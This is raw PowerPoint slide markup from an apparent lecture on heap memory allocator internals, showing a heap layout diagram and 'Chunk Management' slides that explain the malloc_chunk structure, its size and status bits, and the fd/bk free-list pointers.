            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>High addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041431" name="Rectangle 23"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="5029200" y="4574431"/>
            <a:ext cx="1447800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="accent3">
              <a:lumMod val="60000"/>
              <a:lumOff val="40000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>used</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041432" name="Rectangle 24"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="4114800" y="4574431"/>
            <a:ext cx="914400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041433" name="Rectangle 25"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="7391400" y="4574431"/>
            <a:ext cx="1447800" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>wilderness</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1041434" name="Rectangle 26"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="6477000" y="4574431"/>
            <a:ext cx="914400" cy="228600"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="28575">
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="1400">
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>control</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1982793480"/>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3460" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1043461" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="92500" lnSpcReduction="10000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Each chunk starts with a boundary tag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Holds chunk management information</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>16-byte structure, which is the minimum allocated size</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> {</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; // only used when previous chunk is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>size_t</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> size; // size of chunk in bytes (including overhead </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>               // and multiple of 8 bytes) + 2 status bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>fd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; // only used for free chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>struct</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc_chunk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t> *</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>bk</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>; // only used for free chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:buFontTx/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="1200" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>	};</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Pointer returned by </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>()</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> starts at </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>fd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Usually 8 bytes overhead for allocated chunks</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="1511595124"/>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45507" name="Picture 3"/>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1" noChangeArrowheads="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId3"/>
          <a:srcRect/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="919655" y="2171701"/>
            <a:ext cx="6669690" cy="3121819"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1045508" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="384303163"/>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7556" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1047557" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="77500" lnSpcReduction="20000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Only used when previous chunk is free</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>To reduce memory waste, field can hold user data of previous chunk</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:latin typeface="Hack"/>
                <a:cs typeface="Hack"/>
              </a:rPr>
              <a:t>size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Holds chunk size in bytes, but size is always a multiple of 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Chunk size = requested memory (by user via </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>malloc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>) + 8 bytes (overhead) - 4 bytes (</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>prev_size</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> field of next chunk) rounded up to next multiple of 8</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>The 3 least significant bits of the size are always 0, so two of them are used as status bits</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>PREV_INUSE (0x01) – 1 if previous chunk is in use</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="2"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>IS_MMAPED (0x02) – 1 if chunk is memory mapped</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="80407551"/>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83394" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr/>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US"/>
              <a:t>Chunk Management</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083395" name="Rectangle 3"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="222885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prev_size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(not used here)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1200">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083396" name="Rectangle 4"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="245745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size, PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083397" name="Rectangle 5"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="2686050"/>
            <a:ext cx="2362200" cy="6858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data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083398" name="Rectangle 6"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="337185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prev_size </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1050">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>(not used here)</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083399" name="Rectangle 7"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="360045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size, PREV_INUSE=1</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083400" name="Rectangle 8"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="4286250"/>
            <a:ext cx="2362200" cy="3429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free</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083401" name="Rectangle 9"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="462915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prev_size</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083402" name="Rectangle 10"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="485775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size, PREV_INUSE=0</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083403" name="Rectangle 11"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="5086350"/>
            <a:ext cx="2362200" cy="6858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data</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083404" name="Line 12"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="2686050"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083405" name="Text Box 13"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="1600201" y="2343150"/>
            <a:ext cx="934471" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:noFill/>
            <a:miter lim="800000"/>
            <a:headEnd/>
            <a:tailEnd/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="1600">
                <a:solidFill>
                  <a:srgbClr val="000000"/>
                </a:solidFill>
                <a:latin typeface="Roboto Light"/>
                <a:cs typeface="Roboto Light"/>
              </a:rPr>
              <a:t>Chunk A</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083406" name="Rectangle 14"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="382905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fd pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083407" name="Rectangle 15"/>
          <p:cNvSpPr>
            <a:spLocks noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="3352800" y="405765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bk pointer</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1083408" name="Line 16"/>
          <p:cNvSpPr>
            <a:spLocks noChangeShapeType="1"/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="2667000" y="5086350"/>
            <a:ext cx="685800" cy="0"/>
          </a:xfrm>
          <a:prstGeom prst="line">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525">
            <a:solidFill>
              <a:srgbClr val="000000"/>
            </a:solidFill>
            <a:round/>
            <a:headEnd/>
            <a:tailEnd type="triangle" w="med" len="med"/>
          </a:ln>
          <a:effectLst/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" anchor="ctr">
            <a:prstTxWarp prst="textNoShape">
              <a:avLst/>
            </a:prstTxWarp>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="1600">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Roboto Light"/>
              <a:cs typeface="Roboto Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
